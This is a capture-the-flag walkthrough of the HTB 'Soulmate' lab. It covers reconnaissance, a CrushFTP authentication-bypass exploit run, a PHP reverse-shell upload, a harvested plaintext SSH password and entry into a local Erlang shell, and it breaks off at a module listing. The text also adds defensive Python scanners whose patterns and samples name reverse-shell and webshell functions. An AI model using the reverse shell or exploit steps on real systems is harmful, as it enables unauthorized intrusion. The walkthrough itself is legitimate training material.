HTB-Soulmate

Information gathering

nmap scan

┌──(root㉿kali-linux-2024-2)-[~]
└─# nmap 10.129.231.23  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-21 18:38 CST
Nmap scan report for 10.129.231.23
Host is up (2.2s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 25.06 seconds
(I later ran a full-port scan as well, but did not paste it here.)

User

Port 80 redirects to the domain soulmate.htb; adding that domain to /etc/hosts is all that is needed.

Run a dirsearch scan:

┌──(root㉿kali-linux-2024-2)-[~]
└─# dirsearch -u http://soulmate.htb/                                                  
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_   v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_soulmate.htb/__26-02-21_19-19-36.txt

Target: http://soulmate.htb/

[19:19:36] Starting:
[19:21:02] 301 - 178B - /assets -> http://soulmate.htb/assets/          
[19:21:02] 403 - 564B - /assets/                                          
[19:21:22] 302 -   0B - /dashboard.php -> /login                        
[19:21:54] 200 -   8KB - /login.php                                        
[19:21:55] 302 -   0B - /logout.php -> login.php                        
[19:22:20] 302 -   0B - /profile.php -> /login                          
[19:22:25] 200 -   11KB - /register.php                                    
                                                                           
Task Completed  
┌──(root㉿kali-linux-2024-2)-[~]
└─# ffuf -u 'http://soulmate.htb' -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.soulmate.htb" -ac

      /'___\ /'___\           /'___\      
      /\ \__/ /\ \__/ __ __ /\ \__/      
      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
      \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
        \ \_\   \ \_\ \ \____/ \ \_\      
        \/_/   \/_/   \/___/   \/_/      

      v2.1.0-dev
________________________________________________

:: Method           : GET
:: URL             : http://soulmate.htb
:: Wordlist         : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header           : Host: FUZZ.soulmate.htb
:: Follow redirects : false
:: Calibration     : true
:: Timeout         : 10
:: Threads         : 40
:: Matcher         : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

ftp                     [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 53ms]

Add the subdomain found by fuzzing (ftp.soulmate.htb) to /etc/hosts as well.

Using the CrushFTP authentication bypass vulnerability to obtain administrator privileges

The control panel has many modules, including the user manager; with administrator privileges we can reset a user's password and view that user's virtual file system (VFS).

CVE-2025-31161

┌──(root㉿kali-linux-2024-2)-[/home/parallels/Desktop]
└─# python cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user sunempty --password admin123
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully
[+] Exploit Complete you can now login with
  [*] Username: sunempty
  [*] Password: admin123.

Here you can change a user's password. I changed ben's password, and it can be seen that the ben user has added the website's root directory to his virtual file system (VFS).

There is nothing in ben's folder, and clicking on the other entries logs me out for no apparent reason. I then used webProd to upload a file into the webProd directory, whose corresponding site is the main domain.

The uploaded file is served back successfully.

Then I tried a reverse shell, but it either would not connect or was unstable, so I decided to upload a PHP file directly to make the connection.

<?php
$ip = '10.10.xx.xx';
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
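A defender's counterpart to the upload step above, added here as an example (this is not the author's code and not part of the box): a small static triage pass over PHP files in a web-writable directory, such as a web root that an FTP/VFS mapping makes writable. It flags files that pair a socket call with a process-spawning call (the shape of the stub above), files that pass request input to an exec/eval function, and plain command execution. The sample PHP sources, the 192.0.2.10 address and the directory scanner are constructed for the example.

```python
import os
import re
import sys

# Function families that, in combination, characterise the uploaded stub above:
# open a socket, then hand its descriptors to a spawned shell.
NETWORK_FUNCS = {"fsockopen", "pfsockopen", "socket_create", "socket_connect",
                 "stream_socket_client"}
EXEC_FUNCS = {"proc_open", "popen", "exec", "shell_exec", "system", "passthru",
              "pcntl_exec"}
EVAL_FUNCS = {"eval", "assert", "create_function"}
CALL_RE = re.compile(r"\b([a-z_][a-z0-9_]*)\s*\(", re.I)      # identifier followed by "("
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")  # request-controlled input
PHP_EXTENSIONS = (".php", ".phtml", ".phar", ".php5", ".php7")


def analyze_php(source: str) -> dict:
    """Classify one PHP source text by the call families it uses."""
    calls = {m.group(1).lower() for m in CALL_RE.finditer(source)}
    net = sorted(calls & NETWORK_FUNCS)
    ex = sorted(calls & EXEC_FUNCS)
    ev = sorted(calls & EVAL_FUNCS)
    takes_input = bool(SUPERGLOBAL_RE.search(source))
    if net and ex:
        verdict = "reverse_shell_pattern"      # socket + spawned process
    elif (ex or ev) and takes_input:
        verdict = "webshell_pattern"           # request input reaches exec/eval
    elif ex or ev:
        verdict = "command_execution"          # worth a look, may be legitimate
    else:
        verdict = "clean"
    return {"verdict": verdict, "network": net, "exec": ex, "eval": ev,
            "reads_request_input": takes_input}


def scan_tree(root: str) -> dict:
    """Walk a directory and return every PHP file whose verdict is not 'clean'."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                verdict = analyze_php(fh.read())
            if verdict["verdict"] != "clean":
                results[path] = verdict
    return results


# Constructed samples (not files from the box).
BENIGN_PHP = "<?php\n$q = $_GET['q'] ?? '';\necho htmlspecialchars($q, ENT_QUOTES, 'UTF-8');\n"
REVERSE_SHELL_PHP = ("<?php\n$s = fsockopen('192.0.2.10', 4444);\n"
                     "$p = proc_open('/bin/sh -i', array(0=>$s, 1=>$s, 2=>$s), $pipes);\n")
WEBSHELL_PHP = "<?php system($_REQUEST['c']); ?>"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, r in scan_tree(sys.argv[1]).items():   # e.g. the web root
            print(f"{path}: {r['verdict']} net={r['network']} exec={r['exec']} eval={r['eval']}")
    else:
        for name, src in [("benign", BENIGN_PHP), ("reverse_shell", REVERSE_SHELL_PHP),
                          ("webshell", WEBSHELL_PHP)]:
            print(name, "->", analyze_php(src)["verdict"])
```

Run it with the web root as the argument (`python triage.py /var/www/html`, path assumed) after any unexpected write to a web-served directory; the verdict names are deliberately coarse so that the output is a worklist for a human, not a final judgement.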

After the reverse shell came back, I searched for a long time without finding user.txt, so I went through the file system and the running processes, and found this:

www-data@soulmate:~$ cat /usr/local/lib/erlang_login/start.escript
cat /usr/local/lib/erlang_login/start.escript
#!/usr/bin/env escript
%%! -sname ssh_runner

main(_) ->
  application:start(asn1),
  application:start(crypto),
  application:start(public_key),
  application:start(ssh),

  io:format("Starting SSH daemon with logging...~n"),

  case ssh:daemon(2222, [
      {ip, {127,0,0,1}},
      {system_dir, "/etc/ssh"},

      {user_dir_fun, fun(User) ->
          Dir = filename:join("/home", User),
          io:format("Resolving user_dir for ~p: ~s/.ssh~n", [User, Dir]),
          filename:join(Dir, ".ssh")
      end},

      {connectfun, fun(User, PeerAddr, Method) ->
          io:format("Auth success for user: ~p from ~p via ~p~n",
                    [User, PeerAddr, Method]),
          true
      end},

      {failfun, fun(User, PeerAddr, Reason) ->
          io:format("Auth failed for user: ~p from ~p, reason: ~p~n",
                    [User, PeerAddr, Reason]),
          true
      end},

      {auth_methods, "publickey,password"},

      {user_passwords, [{"ben", "HouseH0ldings998"}]},
      {idle_time, infinity},
      {max_channels, 10},
      {max_sessions, 10},
      {parallel_login, true}
  ]) of
      {ok, _Pid} ->
          io:format("SSH daemon running on port 2222. Press Ctrl+C to exit.~n");
      {error, Reason} ->
          io:format("Failed to start SSH daemon: ~p~n", [Reason])
  end,

  receive
      stop -> ok
  end.
www-data@soulmate:~$

This gives ben's SSH username and password:

ben/HouseH0ldings998
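The root cause here is a plaintext credential in a world-readable escript, combined with an SSH daemon that hands every authenticated client the full Erlang shell. As an added example (my code, not the box's or the Erlang project's), the scanner below finds those `ssh:daemon/2` options statically in Erlang source: `user_passwords` tuples (reported with the secret masked), `auth_methods` that allow passwords, an `{ip, {0,0,0,0}}` bind, and a daemon started without a `{shell, ...}` option, which means the default Erlang shell. The sample escript embedded in it is constructed and modelled on start.escript above with a placeholder password.

```python
import re
import sys
from dataclasses import dataclass

# {user_passwords, [{"user", "pass"}, ...]}  -- credentials embedded in source
USER_PASSWORDS_RE = re.compile(r"\{\s*user_passwords\s*,\s*\[(.*?)\]\s*\}", re.S)
CRED_TUPLE_RE = re.compile(r'\{\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\}')
# {auth_methods, "publickey,password"}
AUTH_METHODS_RE = re.compile(r'\{\s*auth_methods\s*,\s*"([^"]*)"\s*\}')
# {ip, {0,0,0,0}} binds the daemon to every interface
BIND_RE = re.compile(r"\{\s*ip\s*,\s*\{\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\}\s*\}")
# A {shell, ...} option replaces the default Erlang shell offered to clients
SHELL_OPT_RE = re.compile(r"\{\s*shell\s*,")
DAEMON_RE = re.compile(r"\bssh:daemon\s*\(")


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def mask(secret: str) -> str:
    """Keep two characters so a reviewer can match the finding, hide the rest."""
    return secret[:2] + "*" * max(0, len(secret) - 2)


def line_of(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1


def scan_erlang_source(text: str) -> list:
    findings = []
    for m in USER_PASSWORDS_RE.finditer(text):
        for t in CRED_TUPLE_RE.finditer(m.group(1)):
            user, pw = t.group(1), t.group(2)
            findings.append(Finding(line_of(text, m.start(1) + t.start()), "hardcoded_password",
                                    f"user={user} password={mask(pw)} ({len(pw)} chars)"))
    for m in AUTH_METHODS_RE.finditer(text):
        methods = [s.strip() for s in m.group(1).split(",")]
        if "password" in methods:
            findings.append(Finding(line_of(text, m.start()), "password_auth_enabled",
                                    f"auth_methods={m.group(1)!r}"))
    for m in BIND_RE.finditer(text):
        if tuple(int(x) for x in m.groups()) == (0, 0, 0, 0):
            findings.append(Finding(line_of(text, m.start()), "wildcard_bind",
                                    "ssh daemon bound to 0.0.0.0"))
    d = DAEMON_RE.search(text)
    if d and not SHELL_OPT_RE.search(text):
        findings.append(Finding(line_of(text, d.start()), "erlang_shell_default",
                                "no {shell, ...} option: clients get the full Erlang shell, "
                                "so os:cmd/1 runs as the daemon's OS user"))
    return findings


# Constructed sample, modelled on start.escript above; the password is a placeholder.
SAMPLE_ESCRIPT = """#!/usr/bin/env escript
%%! -sname ssh_runner
main(_) ->
  ssh:daemon(2222, [
      {ip, {127,0,0,1}},
      {system_dir, "/etc/ssh"},
      {auth_methods, "publickey,password"},
      {user_passwords, [{"ben", "pa55w0rd-placeholder"}]},
      {idle_time, infinity}
  ]).
"""

if __name__ == "__main__":
    sources = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    for name, src in sources or [("<sample>", SAMPLE_ESCRIPT)]:
        for f in scan_erlang_source(src):
            print(f"{name}:{f.line}: {f.kind}: {f.detail}")
```

Pointed at /usr/local/lib/erlang_login/start.escript it reports three findings: the embedded password, password authentication enabled, and the default shell. The corresponding fixes on the Erlang side are `pwdfun` against a hashed store instead of `user_passwords`, public-key-only `auth_methods`, a restricted `shell` callback, and running the daemon as an unprivileged user rather than root.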

Log in over SSH and read user.txt:

┌──(root㉿kali-linux-2024-2)-[/home/parallels/Desktop]
└─# ssh ben@10.129.231.23                          
The authenticity of host '10.129.231.23 (10.129.231.23)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.231.23' (ED25519) to the list of known hosts.
ben@10.129.231.23's password:
Last login: Sat Feb 21 13:05:34 2026 from 10.10.16.35
ben@soulmate:~$ ls
user.txt
ben@soulmate:~$ cat user.txt
724dbf138b24035825e8293aade662cf
ben@soulmate:~$

Root

While digging through the file system it is hard to miss the many Erlang files, and the port listing also shows the process:

ben@soulmate:~$ ps au
USER         PID %CPU %MEM   VSZ   RSS TTY     STAT START   TIME COMMAND
root       1172 0.0 0.0   6176 1116 tty1     Ss+ 10:34   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
www-data   2858 0.0 0.0   7984 3984 pts/0   Ss+ 12:59   0:00 /bin/bash
ben         2978 0.0 0.1   8656 5488 pts/1   Ss   13:05   0:00 /bin/bash -l
ben         3026 0.0 0.0 10072 1588 pts/1   R+   13:08   0:00 ps au
ben@soulmate:~$ ss -tuln
Netid             State             Recv-Q             Send-Q                           Local Address:Port                           Peer Address:Port             Process            
udp               UNCONN             0                 0                               127.0.0.53%lo:53                                   0.0.0.0:*                                    
udp               UNCONN             0                 0                                     0.0.0.0:68                                   0.0.0.0:*                                    
tcp               LISTEN             0                 5                                   127.0.0.1:2222                                 0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                 127.0.0.1:34981                               0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                 127.0.0.1:8443                                 0.0.0.0:*                                    
tcp               LISTEN             0                 128                                 127.0.0.1:41877                               0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                 127.0.0.1:9090                                 0.0.0.0:*                                    
tcp               LISTEN             0                 4096                             127.0.0.53%lo:53                                   0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                 127.0.0.1:8080                                 0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                   0.0.0.0:4369                                 0.0.0.0:*                                    
tcp               LISTEN             0                 511                                   0.0.0.0:80                                   0.0.0.0:*                                    
tcp               LISTEN             0                 128                                   0.0.0.0:22                                   0.0.0.0:*                                    
tcp               LISTEN             0                 4096                                     [::]:4369                                   [::]:*                                    
tcp               LISTEN             0                 511                                       [::]:80                                     [::]:*                                    
tcp               LISTEN             0                 128                                       [::]:22                                     [::]:*
0.0.0.0:4369  LISTEN
127.0.0.1:2222 LISTEN
ben@soulmate:~$ epmd -names
epmd: up and running on port 4369 with data:
name ssh_runner at port 41877

I looked at the distribution mapping, but could not find the cookie, so the node cannot be attacked remotely; port 2222, however, is reachable locally.

From this it is fairly certain that the machine runs an Erlang distributed service: 4369 is epmd, the Erlang node discovery service, and it reports the ssh_runner node on port 41877.
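The picture above is worth checking mechanically on any host that runs Erlang: epmd on 0.0.0.0:4369 tells anyone the node names and distribution ports, while whether a node is actually reachable depends on the bind address of its port and on the cookie. As an added example (my code, not the box's or anything from the Erlang project), the script below correlates `ss -tuln` output with `epmd -names` output and reports which listeners are wildcard-bound and whether each registered node's distribution port is reachable from outside the host. The two sample outputs are constructed to mirror the shape of the listings above.

```python
import re
from dataclasses import dataclass

WILDCARD_HOSTS = {"0.0.0.0", "[::]", "*"}
EPMD_PORT = 4369
EPMD_NAME_RE = re.compile(r"^name\s+(\S+)\s+at\s+port\s+(\d+)\s*$", re.M)


@dataclass(frozen=True)
class Listener:
    proto: str
    host: str
    port: int

    @property
    def wildcard(self) -> bool:
        return self.host in WILDCARD_HOSTS


def parse_ss(text: str) -> list:
    """Parse `ss -tuln` lines into Listener records; header lines are skipped."""
    out = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] not in ("tcp", "udp"):
            continue
        host, port = cols[4].rsplit(":", 1)     # "[::]:4369" -> "[::]", "4369"
        host = host.split("%", 1)[0]            # drop scope ids such as 127.0.0.53%lo
        out.append(Listener(cols[0], host, int(port)))
    return out


def parse_epmd_names(text: str) -> dict:
    """Map node name -> distribution port from `epmd -names` output."""
    return {m.group(1): int(m.group(2)) for m in EPMD_NAME_RE.finditer(text)}


def assess_erlang_exposure(ss_text: str, epmd_text: str) -> dict:
    tcp = [l for l in parse_ss(ss_text) if l.proto == "tcp"]
    nodes = {}
    for name, port in parse_epmd_names(epmd_text).items():
        binds = sorted({l.host for l in tcp if l.port == port})
        nodes[name] = {
            "port": port,
            "binds": binds,
            # Reachable from off-host only if the node's own port is wildcard-bound;
            # a remote shell would additionally need the distribution cookie.
            "reachable_remotely": any(h in WILDCARD_HOSTS for h in binds),
        }
    return {
        "epmd_exposed": any(l.port == EPMD_PORT and l.wildcard for l in tcp),
        "wildcard_ports": sorted({l.port for l in tcp if l.wildcard}),
        "nodes": nodes,
    }


# Constructed samples shaped like the ss -tuln and epmd -names output above.
SS_SAMPLE = """Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53  0.0.0.0:*
tcp   LISTEN 0      5      127.0.0.1:2222    0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:41877   0.0.0.0:*
tcp   LISTEN 0      4096   0.0.0.0:4369      0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      4096   [::]:4369         [::]:*
"""
EPMD_SAMPLE = """epmd: up and running on port 4369 with data:
name ssh_runner at port 41877
"""

if __name__ == "__main__":
    report = assess_erlang_exposure(SS_SAMPLE, EPMD_SAMPLE)
    print("epmd exposed on all interfaces:", report["epmd_exposed"])
    print("wildcard-bound tcp ports:", report["wildcard_ports"])
    for name, info in report["nodes"].items():
        print(f"node {name}: port {info['port']} bound on {info['binds']} "
              f"remote-reachable={info['reachable_remotely']}")
```

On a live host, feed it `subprocess.run(["ss", "-tuln"])` and `subprocess.run(["epmd", "-names"])` output instead of the samples. The sensible hardening for this layout is to bind epmd to loopback (`ERL_EPMD_ADDRESS=127.0.0.1`) or firewall 4369, since a node that only listens on 127.0.0.1 gains nothing from an epmd that advertises it to the world.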

Clearly the privilege escalation goes through Erlang.

SSH into the local port and take a look:

ssh -p 2222 ben@localhost
ben@localhost's password:
Eshell V15.2.5 (press Ctrl+G to abort, type help(). for help)

This drops straight into the Erlang node's interactive shell; the Erlang documentation site covers the shell commands listed below.

(ssh_runner@soulmate)1> help()
                      .

** shell internal commands **
b()       -- display all variable bindings
e(N)       -- repeat the expression in query <N>
f()       -- forget all variable bindings
f(X)       -- forget the binding of variable X
h()       -- history
h(Mod)     -- help about module
h(Mod,Func)-- help about function in module
h(Mod,Func,Arity) -- help about function with arity in module
ht(Mod)   -- help about a module's types
ht(Mod,Type) -- help about type in module
ht(Mod,Type,Arity) -- help about type with arity in module
hcb(Mod)   -- help about a module's callbacks
hcb(Mod,CB) -- help about callback in module
hcb(Mod,CB,Arity) -- help about callback with arity in module
history(N) -- set how many previous commands to keep
results(N) -- set how many previous command results to keep
catch_exception(B) -- how exceptions are handled
v(N)       -- use the value of query <N>
rd(R,D)   -- define a record
rf()       -- remove all record information
rf(R)     -- remove record information about R
rl()       -- display all record information
rl(R)     -- display record information about R
rp(Term)   -- display Term using the shell's record information
rr(File)   -- read record information from File (wildcards allowed)
rr(F,R)   -- read selected record information from file(s)
rr(F,R,O) -- read selected record information with options
lf()       -- list locally defined functions
lt()       -- list locally defined types
lr()       -- list locally defined records
ff()       -- forget all locally defined functions
ff({F,A}) -- forget locally defined function named as atom F and arity A
tf()       -- forget all locally defined types
tf(T)     -- forget locally defined type named as atom T
fl()       -- forget all locally defined functions, types and records
save_module(FilePath) -- save all locally defined functions, types and records to a file
bt(Pid)   -- stack backtrace for a process
c(Mod)     -- compile and load module or file <Mod>
cd(Dir)   -- change working directory
flush()   -- flush any messages sent to the shell
help()     -- help info
h(M)       -- module documentation
h(M,F)     -- module function documentation
h(M,F,A)   -- module function arity documentation
i()       -- information about the system
ni()       -- information about the networked system
i(X,Y,Z)   -- information about pid <X,Y,Z>
l(Module) -- load or reload module
lm()       -- load all modified modules
lc([File]) -- compile a list of Erlang modules
ls()       -- list files in the current directory
ls(Dir)   -- list files in directory <Dir>
m()       -- which modules are loaded
m(Mod)     -- information about module <Mod>
mm()       -- list all modified modules
memory()   -- memory allocation information
memory(T) -- memory allocation information of type <T>
nc(File)   -- compile and load code in <File> on all nodes
nl(Module) -- load module on all nodes
pid(X,Y,Z) -- convert X,Y,Z to a Pid
pwd()     -- print working directory
q()       -- quit - shorthand for init:stop()
regs()     -- information about registered processes
nregs()   -- information about all registered processes
uptime()   -- print node uptime
xm(M)     -- cross reference check a module
y(File)   -- generate a Yecc parser
** commands in module i (interpreter interface) **
ih()       -- print help for the i module
true
(ssh_runner@soulmate)2> pwd().
/
ok
(ssh_runner@soulmate)3> m().
Module               File
application           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application.beam
application_controll /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application_controller.beam
application_master   /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/application_master.beam
atomics               preloaded
auth                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/auth.beam
base64               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/base64.beam
beam_a               /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_a.beam
beam_asm             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_asm.beam
beam_block           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_block.beam
beam_call_types       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_call_types.beam
beam_clean           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_clean.beam
beam_core_to_ssa     /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_core_to_ssa.beam
beam_dict             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_dict.beam
beam_digraph         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_digraph.beam
beam_doc             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_doc.beam
beam_flatten         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_flatten.beam
beam_jump             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_jump.beam
beam_lib             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/beam_lib.beam
beam_opcodes         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_opcodes.beam
beam_ssa             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa.beam
beam_ssa_alias       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_alias.beam
beam_ssa_bc_size     /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bc_size.beam
beam_ssa_bool         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bool.beam
beam_ssa_bsm         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_bsm.beam
beam_ssa_codegen     /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_codegen.beam
beam_ssa_dead         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_dead.beam
beam_ssa_destructive /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_destructive_update.beam
beam_ssa_opt         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_opt.beam
beam_ssa_pre_codegen /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_pre_codegen.beam
beam_ssa_recv         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_recv.beam
beam_ssa_share       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_share.beam
beam_ssa_ss           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_ss.beam
beam_ssa_throw       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_throw.beam
beam_ssa_type         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_ssa_type.beam
beam_trim             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_trim.beam
beam_types           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_types.beam
beam_utils           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_utils.beam
beam_validator       /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_validator.beam
beam_z               /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/beam_z.beam
binary               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/binary.beam
c                     /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/c.beam
cerl                 /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl.beam
cerl_clauses         /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl_clauses.beam
cerl_trees           /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/cerl_trees.beam
code                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/code.beam
code_server           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/code_server.beam
compile               /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/compile.beam
core_lib             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/core_lib.beam
counters             preloaded
crypto               /usr/local/lib/erlang/lib/crypto-5.5.3/ebin/crypto.beam
digraph               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/digraph.beam
digraph_utils         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/digraph_utils.beam
edlin                 /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/edlin.beam
edlin_key             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/edlin_key.beam
epp                   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/epp.beam
erl_abstract_code     /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_abstract_code.beam
erl_anno             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_anno.beam
erl_bifs             /usr/local/lib/erlang/lib/compiler-8.6.1/ebin/erl_bifs.beam
erl_distribution     /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_distribution.beam
erl_epmd             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_epmd.beam
erl_error             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_error.beam
erl_eval             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_eval.beam
erl_expand_records   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_expand_records.beam
erl_features         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_features.beam
erl_init             preloaded
erl_internal         /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_internal.beam
erl_lint             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_lint.beam
erl_parse             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_parse.beam
erl_prim_loader       preloaded
erl_scan             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/erl_scan.beam
erl_signal_handler   /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erl_signal_handler.beam
erl_tracer           preloaded
erlang               preloaded
erpc                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/erpc.beam
error_handler         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/error_handler.beam
error_logger         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/error_logger.beam
erts_code_purger     preloaded
erts_dirty_process_s preloaded
erts_internal         preloaded
erts_literal_area_co preloaded
erts_trace_cleaner   preloaded
escript               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/escript.beam
ets                   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/ets.beam
file                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file.beam
file_io_server       /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file_io_server.beam
file_server           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/file_server.beam
filename             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/filename.beam
gb_sets               /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gb_sets.beam
gb_trees             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gb_trees.beam
gen                   /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen.beam
gen_event             /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_event.beam
gen_server           /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_server.beam
gen_statem           /usr/local/lib/erlang/lib/stdlib-6.2.2/ebin/gen_statem.beam
gen_tcp               /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/gen_tcp.beam
global               /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/global.beam
global_group         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/global_group.beam
group                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/group.beam
group_history         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/group_history.beam
heart                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/heart.beam
inet                 /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet.beam
inet_config           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_config.beam
inet_db               /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_db.beam
inet_gethost_native   /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_gethost_native.beam
inet_parse           /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_parse.beam
inet_tcp             /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_tcp.beam
inet_tcp_dist         /usr/local/lib/erlang/lib/kernel-10.2.5/ebin/inet_tcp_dist.beam
